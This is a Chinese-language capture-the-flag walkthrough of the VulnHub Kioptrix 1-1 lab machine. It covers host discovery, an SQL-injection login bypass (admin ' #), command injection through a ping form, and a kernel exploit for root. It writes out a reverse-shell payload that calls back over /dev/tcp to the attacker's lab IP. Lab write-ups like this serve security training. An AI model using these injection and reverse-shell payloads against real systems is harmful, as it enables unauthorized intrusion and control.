【vulnhub】KIOPTRIX: 1-1(sql注入,任意命令执行漏洞,内核提权)

主机探测

image.png

确认目标靶机IP为:192.168.3.153
也可以用nmap探测网段


image.png

服务发现

image.png

开启的服务还挺多,apache的版本比KIOPTRIX: 1高了不少
打开http服务查看
image.png

就是一个登陆框,在usename构造admin ' #sql注入绕过,得到一个web console
image.png

输入百度的网址,得到ping结果
image.png

尝试 www.baidu.com | ls看看是否可以执行任意命令
image.png

可以执行。ok,我们尝试构造一个shell,方便后面的渗透
尝试在当前目录写入一句话php木马,发现用户组没有写权限
尝试用nc构造一个反弹shell,发现好像无法反弹。。
于是谷歌了一下,看看还有什么反弹方法,在网上找到一个方法:
1,在kali开启监听
nc -lvp 4444
2,在网页执行命令
w||bash -c "bash -i >& /dev/tcp/192.168.3.67/4444 0>&1"
直接反弹了一个bash
image.png

提权

查看内核版本


image.png

谷歌搜索此内核版本的提权脚本


image.png

选择第一条,从靶机wget到本地
按脚本注释提示操作,执行,得到一个root shell
image.png

总结

学习机,别想太复杂就行。。。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容